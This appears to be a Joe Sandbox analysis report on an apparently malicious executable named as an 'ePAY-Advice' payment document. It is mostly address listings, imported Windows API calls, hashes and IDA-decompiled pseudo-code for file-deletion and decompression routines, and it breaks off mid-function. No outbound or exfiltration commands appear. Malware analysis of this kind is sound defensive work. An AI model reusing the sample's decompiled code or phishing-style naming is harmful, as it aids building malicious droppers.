0x6e161ad5
0x6e161ad8
0x6e161ae0
0x6e161ae0
0x6e161ae5
0x6e161ae8
0x00000000
0x00000000
0x6e161af2
0x6e161af4
0x6e161af9
0x6e161afb
0x6e161b6d
0x6e161b6d
0x6e161b6d
0x6e161b71
0x6e161b74
0x6e161b76
0x6e161b98
0x6e161b9b
0x6e161b9d
0x6e161ba6
0x6e161bac
0x6e161bae
0x6e161bb4
0x6e161bb4
0x6e161bba
0x6e161bbd
0x6e161bbd
0x6e161bc0
0x6e161bc0
0x6e161bc6
0x6e161bc8
0x6e161bcb
0x6e161bd1
0x6e161bd4
0x6e161bd4
0x6e161bd6
0x6e161bdc
0x6e161bdf
0x6e161c03
0x6e161c06
0x00000000
0x00000000
0x6e161c09
0x6e161c0b
0x6e161c19
0x6e161c1c
0x6e161c1e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e161c20
0x6e161c20
0x6e161c20
0x6e161c26
0x6e161c28
0x00000000
0x00000000
0x6e161c2a
0x6e161c2c
0x6e161c2e
0x6e161c30
0x00000000
0x00000000
0x00000000
0x6e161c30
0x6e161c32
0x6e161c34
0x6e161c36
0x6e161c36
0x6e161c3c
0x6e161c42
0x6e161c44
0x6e161c58
0x6e161c58
0x6e161c5a
0x6e161c46
0x6e161c4c
0x6e161c4f
0x6e161c4f
0x00000000
0x6e161be1
0x6e161be1
0x6e161be1
0x6e161be2
0x6e161bea
0x6e161bee
0x6e161bf4
0x6e161bf8
0x6e161c60
0x6e161c63
0x6e161c66
0x6e161cd8
0x6e161cdc
0x6e161add
0x00000000
0x6e161add
0x00000000
0x6e161cdc
0x6e161be4
0x6e161be4
0x6e161be5
0x00000000
0x00000000
0x6e161be7
0x6e161be8
0x00000000
0x00000000
0x00000000
0x6e161be8
0x6e161bdf
0x6e161b79
0x00000000
0x00000000
0x6e161b82
0x6e161b85
0x6e161b92
0x6e161b92
0x6e161b87
0x00000000
0x6e161b87
0x6e161afd
0x6e161b00
0x6e161b51
0x6e161b54
0x6e161b65
0x6e161b65
0x6e161b68
0x00000000
0x6e161b68
0x6e161b56
0x6e161b5a
0x00000000
0x00000000
0x6e161b5c
0x6e161b5f
0x6e161c6b
0x6e161c6e
0x6e161c6e
0x6e161c70
0x6e162015
0x6e162018
0x6e16207b
0x6e161cc9
0x6e161ccc
0x6e161ccf
0x6e161cd2
0x6e161cd2
0x6e161cd4
0x6e161cd4
0x6e161cd4
0x6e161cd5
0x00000000
0x6e161cd5
0x6e16201a
0x6e16201d
0x6e162029
0x6e162029
0x6e16202c
0x6e16202f
0x6e16203a
0x6e16203a
0x6e16203d
0x6e162040
0x6e162087
0x6e16208a
0x6e16208d
0x00000000
0x6e16208d
0x6e162042
0x6e162045
0x00000000
0x00000000
0x6e162047
0x6e16204e
0x6e16204e
0x6e162054
0x6e162057
0x6e162073
0x6e162059
0x6e162062
0x6e162065
0x6e162065
0x00000000
0x6e162057
0x6e162031
0x00000000
0x6e162031
0x6e16201f
0x6e162022
0x00000000
0x00000000
0x6e162024
0x6e162027
0x00000000
0x00000000
0x00000000
0x6e162027
0x6e161c76
0x6e161c76
0x6e161c77
0x6e161dc0
0x6e161dc0
0x6e161dc7
0x6e161dca
0x00000000
0x00000000
0x6e161dd7
0x00000000
0x6e161fbd
0x6e161fc0
0x6e161fc3
0x6e161fc3
0x6e161fc4
0x6e161fc7
0x6e161fc9
0x6e161fcb
0x00000000
0x00000000
0x6e161fcd
0x6e161fcd
0x6e161fd0
0x6e161fe2
0x6e161fe5
0x6e161fe8
0x6e161fee
0x00000000
0x6e161fee
0x6e161fd2
0x6e161fd2
0x6e161fd4
0x00000000
0x00000000
0x6e161fd6
0x6e161fd8
0x6e161fda
0x6e161fda
0x6e161fda
0x6e161fdb
0x6e161fdd
0x6e161fdf
0x6e161fc3
0x6e161fc4
0x6e161fc7
0x6e161fc9
0x6e161fcb
0x00000000
0x00000000
0x00000000
0x6e161fcb
0x00000000
0x6e161e1e
0x00000000
0x00000000
0x6e161e2a
0x00000000
0x00000000
0x6e161e11
0x6e161e15
0x6e161e19
0x00000000
0x00000000
0x6e161f8f
0x6e161f93
0x00000000
0x00000000
0x6e161f99
0x6e161fa1
0x6e161fa8
0x6e161fb0
0x00000000
0x00000000
0x6e161ef7
0x6e161ef7
0x00000000
0x00000000
0x6e161e33
0x00000000
0x00000000
0x6e16200d
0x00000000
0x00000000
0x6e161eff
0x6e161f01
0x6e161f01
0x00000000
0x00000000
0x6e161ffd
0x00000000
0x00000000
0x6e162001
0x00000000
0x00000000
0x6e162009
0x00000000
0x00000000
0x6e161f46
0x6e161f48
0x6e161f48
0x00000000
0x00000000
0x6e161f11
0x6e161f13
0x6e161f13
0x00000000
0x00000000
0x6e161f23
0x6e161f25
0x6e161f25
0x00000000
0x00000000
0x6e161f54
0x6e161f56
0x6e161f56
0x00000000
0x00000000
0x6e161f2e
0x6e161f30
0x6e161f30
0x00000000
0x00000000
0x6e161f35
0x00000000
0x00000000
0x6e162005
0x6e16200f
0x6e16200f
0x00000000
0x00000000
0x6e161f5f
0x6e161f63
0x6e161f68
0x6e161f6b
0x6e161f6c
0x6e161f6f
0x6e161f75
0x6e161f75
0x00000000
0x00000000
0x6e161ff5
0x00000000
0x00000000
0x6e161f39
0x6e161f39
0x00000000
0x00000000
0x6e161e3a
0x6e161e3a
0x00000000
0x00000000
0x6e161f4d
0x6e161f4f
0x6e161f4f
0x00000000
0x00000000
0x6e161dde
0x6e161de4
0x6e161de7
0x6e161de9
0x6e161de9
0x6e161dec
0x6e161df0
0x6e161dfd
0x6e161dff
0x6e161e05
0x6e161e05
0x6e161e05
0x00000000
0x00000000
0x6e161f02
0x6e161f02
0x6e161f04
0x6e161f0b
0x00000000
0x00000000
0x6e161f49
0x6e161f49
0x00000000
0x00000000
0x6e161f14
0x6e161f14
0x6e161f16
0x6e161f1d
0x00000000
0x00000000
0x6e161f26
0x6e161f26
0x6e161f28
0x00000000
0x00000000
0x6e161f57
0x6e161f57
0x00000000
0x00000000
0x6e161f31
0x6e161f31
0x00000000
0x00000000
0x6e161f7d
0x6e161f81
0x6e161f86
0x6e161f89
0x00000000
0x00000000
0x6e161f3b
0x6e161f3b
0x6e161f3e
0x6e161f40
0x00000000
0x00000000
0x6e161f50
0x6e161f50
0x6e161f59
0x6e161f59
0x6e161e3c
0x6e161e3c
0x6e161e3f
0x6e161e46
0x6e161e48
0x6e161e4a
0x6e161e51
0x6e161e54
0x6e161e59
0x6e161e5b
0x6e161e5d
0x6e161e61
0x6e161e67
0x6e161e6d
0x6e161e6d
0x6e161e6f
0x6e161e6f
0x6e161e70
0x6e161e70
0x6e161e74
0x6e161e7a
0x6e161e7c
0x6e161e80
0x6e161e85
0x6e161e85
0x6e161e87
0x6e161e87
0x6e161e8a
0x6e161e8d
0x6e161e96
0x6e161e99
0x6e161e9c
0x6e161e9c
0x6e161e9e
0x6e161ea1
0x6e161ea7
0x6e161ead
0x6e161ead
0x6e161eaf
0x00000000
0x00000000
0x6e161eb5
0x6e161eb5
0x6e161eb9
0x6e161ec0
0x6e161ee4
0x6e161ee4
0x6e161ee8
0x6e161eea
0x6e161eed
0x6e161eed
0x6e161ef0
0x6e161ef0
0x00000000
0x6e161ee8
0x6e161ec5
0x6e161ec8
0x6e161ec8
0x6e161ecf
0x6e161ed1
0x6e161ed4
0x6e161edb
0x6e161edc
0x6e161ee2
0x6e161ee2
0x00000000
0x6e161ee2
0x6e161ed6
0x6e161ed9
0x00000000
0x00000000
0x00000000
0x6e161ed9
0x6e161e69
0x6e161e6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e161dd7
0x6e161c7d
0x6e161c7d
0x6e161c7e
0x6e161dbd
0x00000000
0x6e161dbd
0x6e161c84
0x6e161c85
0x00000000
0x00000000
0x6e161c8b
0x6e161c8e
0x6e161d82
0x6e161d82
0x6e161d85
0x6e161d9a
0x6e161d9c
0x6e161d9c
0x6e161d9d
0x6e161da0
0x6e161da3
0x6e161daf
0x6e161daf
0x6e161daf
0x6e161da5
0x6e161da5
0x6e161da5
0x6e161db5
0x00000000
0x6e161db5
0x6e161d87
0x6e161d87
0x6e161d88
0x6e161d96
0x00000000
0x6e161d96
0x6e161d8b
0x6e161d8c
0x00000000
0x00000000
0x6e161d92
0x00000000
0x6e161d92
0x6e161c94
0x6e161d7e
0x00000000
0x6e161d7e
0x6e161c9a
0x6e161c9a
0x6e161c9d
0x6e161cc6
0x00000000
0x6e161cc6
0x6e161c9f
0x6e161c9f
0x6e161ca2
0x6e161cbc
0x00000000
0x6e161cbc
0x6e161ca4
0x6e161ca4
0x6e161ca7
0x6e161cb6
0x00000000
0x6e161cb6
0x6e161caa
0x6e161cab
0x00000000
0x00000000
0x6e161cad
0x00000000
0x6e161cad
0x00000000
0x6e161b5f
0x6e161b02
0x6e161b05
0x6e161b34
0x6e161b38
0x6e161b3f
0x6e161b46
0x6e161b49
0x6e161b4c
0x00000000
0x6e161b4c
0x6e161b07
0x6e161b08
0x6e161b23
0x6e161b2a
0x6e161b2d
0x00000000
0x6e161b2d
0x6e161b0d
0x00000000
0x6e161b13
0x6e161b13
0x6e161b1a
0x00000000
0x6e161b1a
0x6e161b0d
0x6e161ceb
0x6e161cf0
0x6e161cf5
0x6e161cf9
0x6e16218a
0x6e162190
0x6e161d0b
0x6e161d0d
0x6e161d0e
0x6e1620b5
0x6e1620b5
0x6e1620b8
0x6e1620bb
0x6e1620d8
0x6e1620de
0x6e1620e0
0x6e1620e6
0x6e1620fd
0x6e1620fd
0x6e1620fd
0x6e16210a
0x6e162110
0x6e162113
0x6e162119
0x6e16211b
0x6e16211e
0x6e162120
0x6e162127
0x6e16212c
0x6e16212f
0x6e162131
0x6e162136
0x6e162148
0x6e162148
0x6e162136
0x6e16212f
0x6e16211e
0x6e16214e
0x6e162151
0x6e16215b
0x6e162163
0x6e16216f
0x6e162175
0x6e162178
0x6e1620aa
0x6e1620aa
0x00000000
0x6e1620aa
0x6e16217e
0x6e162184
0x6e162184
0x00000000
0x00000000
0x6e162186
0x6e162186
0x6e162186
0x6e162186
0x00000000
0x6e162153
0x6e162153
0x6e162159
0x00000000
0x00000000
0x00000000
0x6e162159
0x6e162151
0x6e1620e9
0x6e1620ef
0x6e1620f1
0x6e1620f7
0x00000000
0x00000000
0x00000000
0x6e1620f7
0x6e1620bd
0x6e1620c4
0x6e1620ca
0x6e1620d0
0x00000000
0x6e1620d0
0x6e161d14
0x6e161d15
0x6e162094
0x6e162094
0x6e16209a
0x6e16209d
0x00000000
0x00000000
0x6e1620a4
0x6e1620a9
0x00000000
0x6e1620a9
0x6e161d1c
0x00000000
0x00000000
0x6e161d22
0x6e161d22
0x6e161d2b
0x6e161d30
0x6e161d36
0x00000000
0x00000000
0x6e161d3c
0x6e161d49
0x6e161d4f
0x6e161d59
0x6e161d5f
0x6e161d67
0x6e161d77
0x00000000
0x6e161d77

APIs

Part of subcall function 6E161215: GlobalAlloc.KERNELBASE(00000040,6E161233,?,6E1612CF,-6E16404B,6E1611AB,-000000A0), ref: 6E16121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6E161BA6
lstrcpyA.KERNEL32(00000008,?), ref: 6E161BEE
lstrcpyA.KERNEL32(00000408,?), ref: 6E161BF8
GlobalFree.KERNEL32 ref: 6E161C0B
GlobalFree.KERNEL32 ref: 6E161CEB
GlobalFree.KERNEL32 ref: 6E161CF0
GlobalFree.KERNEL32 ref: 6E161CF5
GlobalFree.KERNEL32 ref: 6E161EDC
lstrcpyA.KERNEL32(?,?), ref: 6E162065
GetModuleHandleA.KERNEL32(00000008), ref: 6E1620D8
LoadLibraryA.KERNEL32(00000008), ref: 6E1620E9
GetProcAddress.KERNEL32(?,?), ref: 6E162142
lstrlenA.KERNEL32(00000408), ref: 6E16215C

Strings

Nhv, xrefs: 6E162142

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID: Nhv
API String ID: 245916457-1159304218
Opcode ID: 1a1dcc763431693594a4e8618d9bb5ac6612a8a6d463f9a356361e28c0518176
Instruction ID: 04ba110bdacd1ab2793cb587c99c6356c81d2fcdea467c5e6b6f6b87f1940e32
Opcode Fuzzy Hash: 1a1dcc763431693594a4e8618d9bb5ac6612a8a6d463f9a356361e28c0518176
Instruction Fuzzy Hash: ED22BE71E0421ADEDB50CFE9C4847EDBBF4BB15304F61892AD1A9E3280D77499E9EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00405732 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405732(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E004059F0(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4237a8 =  *0x4237a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405F6A(0x420d10, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405949(_t73);
					} else {
						lstrcatA(0x420d10, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x409014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x420d10,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E0040592D( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405F6A(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004056EA(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405091(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4237a8 =  *0x4237a8 + 1;
										} else {
											E00405091(0xfffffff1, _t73);
											E00405D49(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405732(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x420d10 - 0x5c;
					if( *0x420d10 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040626D(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405902(_t73);
							_t40 = E004056EA(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405091(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405091(0xfffffff1, _t73);
							return E00405D49(_t72, _t73, 0);
						}
						L33:
						 *0x4237a8 =  *0x4237a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040573c
0x00405741
0x0040574a
0x0040574d
0x00405755
0x00405758
0x0040575b
0x00405763
0x00405765
0x00405766
0x00000000
0x00405766
0x00405771
0x00405774
0x00405774
0x00405774
0x00405778
0x0040578b
0x00405792
0x00405797
0x0040579b
0x004057ab
0x0040579d
0x004057a3
0x004057a3
0x004057b0
0x004057b3
0x004057be
0x004057c4
0x004057c9
0x004057d9
0x004057db
0x004057e1
0x004057e4
0x004057e7
0x0040589f
0x0040589f
0x004058a3
0x004058a5
0x004058a5
0x004058a5
0x004058a5
0x00000000
0x00000000
0x00000000
0x00000000
0x004057ed
0x004057ed
0x004057f6
0x004057fc
0x00405801
0x00405804
0x00405806
0x0040580a
0x0040580c
0x0040580c
0x0040580a
0x0040580f
0x00405812
0x00405825
0x00405827
0x0040582c
0x00405833
0x0040584e
0x00405853
0x00405855
0x00405879
0x00405857
0x00405857
0x0040585a
0x0040586e
0x0040585c
0x0040585f
0x00405867
0x00405867
0x0040585a
0x00405835
0x0040583b
0x0040583d
0x00405843
0x00405843
0x0040583d
0x00000000
0x00405833
0x00405814
0x00405817
0x00405819
0x00000000
0x00000000
0x0040581b
0x0040581d
0x00000000
0x00000000
0x0040581f
0x00405823
0x00000000
0x00000000
0x00000000
0x0040587e
0x00405888
0x0040588e
0x0040588e
0x00405899
0x00000000
0x00405899
0x004057b5
0x004057bc
0x00000000
0x00000000
0x00000000
0x0040577a
0x0040577a
0x0040577c
0x004058a9
0x004058ab
0x004058ae
0x004058ff
0x004058ff
0x004058ff
0x004058b0
0x004058b3
0x004058be
0x004058c3
0x004058c5
0x00000000
0x00000000
0x004058c8
0x004058d4
0x004058d9
0x004058db
0x00000000
0x004058f6
0x004058dd
0x004058e0
0x00000000
0x00000000
0x004058e5
0x00000000
0x004058ec
0x004058b5
0x004058b5
0x00000000
0x004058b5
0x00405782
0x00405785
0x00000000
0x00000000
0x00000000
0x00405785

APIs

DeleteFileA.KERNELBASE(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040575B
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A3
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C4
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CA
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DB
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405888
FindClose.KERNEL32(00000000), ref: 00405899

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 00405732
\*.*, xrefs: 0040579D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040573F

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1598758325
Opcode ID: a609e064482b2e4768f6e8ae306abeb833a6bacd57bf4db90433ec601c91c8e5
Instruction ID: 4530166bbd706fa81c440e6583376772d6fc270faa34d54a03d6882d8fc6be8c
Opcode Fuzzy Hash: a609e064482b2e4768f6e8ae306abeb833a6bacd57bf4db90433ec601c91c8e5
Instruction Fuzzy Hash: 7351B332904A09BADB216B728C45BAF7A78DF42714F14817BF841B11D2D73C8952DEA9

Uniqueness

Uniqueness Score: -1.00%

Function 004065F6 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E004065F6() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
